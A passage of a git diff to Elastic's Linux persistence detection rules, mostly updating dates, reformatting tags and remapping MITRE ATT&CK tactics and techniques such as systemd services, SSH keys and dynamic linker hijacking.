"2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,11 +92,6 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -107,35 +102,10 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" - -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml index 7dccbc4c3f0..428eb0ddf21 100644 --- a/rules/linux/persistence_setuid_setgid_capability_set.toml +++ b/rules/linux/persistence_setuid_setgid_capability_set.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -135,17 +135,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -160,14 +150,6 @@ process.name == "setcap" and process.args : "cap_set?id+ep" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml index da1bfc93904..4122d6985d9 100644 --- a/rules/linux/persistence_shared_object_creation.toml +++ b/rules/linux/persistence_shared_object_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -149,15 +149,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -200,11 +192,46 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["file.name", "process.name"] diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml index 11e4f177db0..64589559842 100644 --- a/rules/linux/persistence_simple_web_server_connection_accepted.toml +++ b/rules/linux/persistence_simple_web_server_connection_accepted.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,16 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -106,48 +97,30 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" - - [[rule.threat.technique]] - id = "T1505" - name = "Server Software Component" - reference = "https://attack.mitre.org/techniques/T1505/" - - [[rule.threat.technique.subtechnique]] - id = "T1505.003" - name = "Web Shell" - reference = "https://attack.mitre.org/techniques/T1505/003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_simple_web_server_creation.toml b/rules/linux/persistence_simple_web_server_creation.toml index a36dadf7d26..c9053518df8 100644 --- a/rules/linux/persistence_simple_web_server_creation.toml +++ b/rules/linux/persistence_simple_web_server_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,19 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -118,43 +106,7 @@ id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_site_and_user_customize_file_creation.toml b/rules/linux/persistence_site_and_user_customize_file_creation.toml index d0ae0b7eb1f..9802a00b6a8 100644 --- a/rules/linux/persistence_site_and_user_customize_file_creation.toml +++ b/rules/linux/persistence_site_and_user_customize_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,16 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -130,38 +121,7 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_ssh_key_generation.toml b/rules/linux/persistence_ssh_key_generation.toml index e8f2c4ff724..a6266d7c8d8 100644 --- a/rules/linux/persistence_ssh_key_generation.toml +++ b/rules/linux/persistence_ssh_key_generation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,48 +77,3 @@ not file.name : "known_hosts.*" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.004" -name = "SSH Authorized Keys" -reference = "https://attack.mitre.org/techniques/T1098/004/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/linux/persistence_ssh_netcon.toml b/rules/linux/persistence_ssh_netcon.toml index bde9a2bb722..70955671bcf 100644 --- a/rules/linux/persistence_ssh_netcon.toml +++ b/rules/linux/persistence_ssh_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,39 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1546/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml index cf09a455608..1a90771db07 100644 --- a/rules/linux/persistence_ssh_via_backdoored_system_user.toml +++ b/rules/linux/persistence_ssh_via_backdoored_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,15 +78,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: System", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: System", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -102,38 +94,37 @@ user.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.004" -name = "SSH Authorized Keys" -reference = "https://attack.mitre.org/techniques/T1098/004/" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1564.002" -name = "Hidden Users" -reference = "https://attack.mitre.org/techniques/T1564/002/" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "host.id"] diff --git a/rules/linux/persistence_suspicious_file_opened_through_editor.toml b/rules/linux/persistence_suspicious_file_opened_through_editor.toml index a3db7c8cbe3..eb4b2615df6 100644 --- a/rules/linux/persistence_suspicious_file_opened_through_editor.toml +++ b/rules/linux/persistence_suspicious_file_opened_through_editor.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,56 +96,116 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique.subtechnique]] id = "T1037.004" name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" - +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml index 793a712a67b..838efbe0499 100644 --- a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml +++ b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,16 +57,7 @@ references = [ risk_score = 47 rule_id = "7afc6cc9-8800-4c7f-be6b-b688d2dea248" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -93,27 +84,19 @@ sequence by host.id with maxspan=1m framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -128,16 +111,6 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" diff --git a/rules/linux/persistence_systemd_generator_creation.toml b/rules/linux/persistence_systemd_generator_creation.toml index 1405518b4e7..b706888c01e 100644 --- a/rules/linux/persistence_systemd_generator_creation.toml +++ b/rules/linux/persistence_systemd_generator_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,15 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -129,34 +121,11 @@ file where host.os.type == "linux" and event.action in ("rename", "creation") an framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml index 3d67cd46113..010e0f2e8fc 100644 --- a/rules/linux/persistence_systemd_netcon.toml +++ b/rules/linux/persistence_systemd_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,16 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -136,6 +127,37 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" @@ -146,28 +168,7 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml index 4d7bc96589f..142f84b49eb 100644 --- a/rules/linux/persistence_systemd_service_started.toml +++ b/rules/linux/persistence_systemd_service_started.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -164,15 +164,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -201,19 +193,19 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = 